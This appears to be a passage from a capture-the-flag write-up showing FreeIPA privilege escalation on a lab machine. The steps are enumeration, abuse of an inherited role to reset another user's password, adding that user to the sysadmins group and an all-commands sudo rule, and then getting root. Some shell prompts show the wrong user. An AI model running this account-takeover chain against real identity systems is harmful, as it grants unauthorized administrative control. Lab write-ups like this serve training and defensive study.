Ticket cache: KEYRING:persistent:2003:2003
Default principal: [email protected]
Valid starting Expires Service principal
06/19/25 08:05:32 06/20/25 07:57:57 krbtgt/[email protected]
Commands to enumerate the realm:
ipa user-find
ipa host-find
ipa sudorule-find
This gives results similar to what we uncovered earlier. Now we can focus on the compromised user donna_adams with the user-show command:
donna_adams@main:~$ ipa user-show donna_adams --all --raw
dn: uid=donna_adams,cn=users,cn=accounts,dc=sorcery,dc=htb
uid: donna_adams
givenname: donna
sn: adams
cn: donna adams
initials: da
homedirectory: /home/donna_adams
gecos: donna adams
loginshell: /bin/sh
krbcanonicalname: [email protected]
krbprincipalname: [email protected]
mail: [email protected]
uidnumber: 1638400003
gidnumber: 1638400003
nsaccountlock: FALSE
has_password: TRUE
has_keytab: TRUE
displayName: donna adams
ipaNTSecurityIdentifier: S-1-5-21-820725746-4072777037-1046661441-1003
ipaUniqueID: c60a9328-96eb-11ef-ace5-0242ac170002
krbPasswordExpiration: 20400101000000Z
memberof: ipaUniqueID=c4f41b80-96eb-11ef-9cbc-0242ac170002,cn=hbac,dc=sorcery,dc=htb
memberof: ipaUniqueID=c54549ba-96eb-11ef-9408-0242ac170002,cn=hbac,dc=sorcery,dc=htb
memberof: cn=ipausers,cn=groups,cn=accounts,dc=sorcery,dc=htb
memberofindirect: cn=change_userPassword_ash_winter_ldap,cn=permissions,cn=pbac,dc=sorcery,dc=htb
memberofindirect: cn=change_userPassword_ash_winter_ldap,cn=privileges,cn=pbac,dc=sorcery,dc=htb
memberofindirect: cn=change_userPassword_ash_winter_ldap,cn=roles,cn=accounts,dc=sorcery,dc=htb
objectClass: top
objectClass: person
objectClass: organizationalperson
objectClass: inetorgperson
objectClass: inetuser
objectClass: posixaccount
objectClass: krbprincipalaux
objectClass: krbticketpolicyaux
objectClass: ipaobject
objectClass: ipasshuser
objectClass: ipaSshGroupOfPubKeys
objectClass: mepOriginEntry
objectClass: ipantuserattrs
As we can see, donna_adams is an indirect member of a role named change_userPassword_ash_winter_ldap.
IPA ACLs
In FreeIPA the chain is:
role → privileges → permissions → actual LDAP rights
So if a user sits in (or under) a role, they inherit every permission contained in that role.
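The inheritance can be modelled in a few lines of bash: a role names its privileges, each privilege names its permissions, and a role member ends up with the union. This is a toy illustration with invented names (helpdesk, reset_passwords), not FreeIPA code:

```shell
#!/usr/bin/env bash
# Toy model of FreeIPA's role -> privilege -> permission chain.
declare -A role_privs=( [helpdesk]="reset_passwords" )
declare -A priv_perms=( [reset_passwords]="write_userPassword write_krbPrincipalKey" )

# resolve <role>: print every LDAP right the role ultimately grants.
resolve() {
  local role=$1 priv perm
  for priv in ${role_privs[$role]}; do
    for perm in ${priv_perms[$priv]}; do
      echo "$perm"
    done
  done
}

resolve helpdesk
```

A member of the toy helpdesk role resolves to both write rights, which mirrors how donna_adams ends up holding a password-write permission she was never directly assigned.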
Next, we can inspect what the role really grants:
donna_adams@main:~$ ipa role-show "change_userPassword_ash_winter_ldap" --all
ipa: ERROR: change_userPassword_ash_winter_ldap: permission not found
ash_winter@main:~$ ipa privilege-show "change_userPassword_ash_winter_ldap" --all
ipa: ERROR: change_userPassword_ash_winter_ldap: privilege not found
ash_winter@main:~$ ipa permission-find change_userPassword_ash_winter_ldap
---------------------
0 permissions matched
---------------------
----------------------------
Number of entries returned 0
----------------------------
It looks like an undocumented custom role. We can still try querying LDAP for it directly:
donna_adams@main:~$ ldapsearch -x -H ldap://dc01.sorcery.htb \
-b "cn=roles,cn=accounts,dc=sorcery,dc=htb" \
"(cn=change_userPassword_ash_winter_ldap)"
# extended LDIF
#
# LDAPv3
# base <cn=roles,cn=accounts,dc=sorcery,dc=htb> with scope subtree
# filter: (cn=change_userPassword_ash_winter_ldap)
# requesting: ALL
#
# search result
search: 2
result: 0 Success
# numResponses: 1
No readable entry there either, but the role's name tells us everything. Since the underlying permission is already in place, the write works immediately:
donna_adams@main:~$ ipa user-mod ash_winter --password
Password:
Enter Password again to verify:
--------------------------
Modified user "ash_winter"
--------------------------
User login: ash_winter
First name: ash
Last name: winter
Home directory: /home/ash_winter
Login shell: /bin/sh
Principal name: [email protected]
Principal alias: [email protected]
Email address: [email protected]
UID: 1638400004
GID: 1638400004
Account disabled: False
Password: True
Member of groups: ipausers
Member of HBAC rule: allow_ssh, allow_sudo
Indirect Member of role: add_sysadmin
Kerberos keys available: True
We have successfully changed ash_winter's password.
IPA Sudo
Modified user "ash_winter"
…
Indirect Member of role: add_sysadmin
Member of HBAC rule: allow_ssh, allow_sudo
The single line "Indirect Member of role: add_sysadmin" is the key to rooting the box.
Log in as ash_winter (via kinit to get a TGT or SSH):

Again, the name of this custom privilege is self-explanatory: add_sysadmin implies write access to the group sysadmins, so we can add members (including ourselves) to it:
ash_winter@main:~$ ipa group-add-member sysadmins --users=ash_winter
Group name: sysadmins
GID: 1638400005
Member users: ash_winter
Indirect Member of role: manage_sudorules_ldap
-------------------------
Number of members added 1
-------------------------
There, we uncover another role: Indirect Member of role: manage_sudorules_ldap.
Drop our user explicitly into the universal rule allow_sudo to gain the same sudo rights as the admin user:
ash_winter@main:~$ ipa sudorule-add-user allow_sudo --users=ash_winter
Rule name: allow_sudo
Enabled: True
Host category: all
Command category: all
RunAs User category: all
RunAs Group category: all
Users: admin, ash_winter
-------------------------
Number of members added 1
-------------------------
Restart SSSD to flush its cache so the new sudo rule takes effect immediately:
sudo /usr/bin/systemctl restart sssd
Then escalate with any of sudo su, sudo su -, or sudo -i. Rooted:
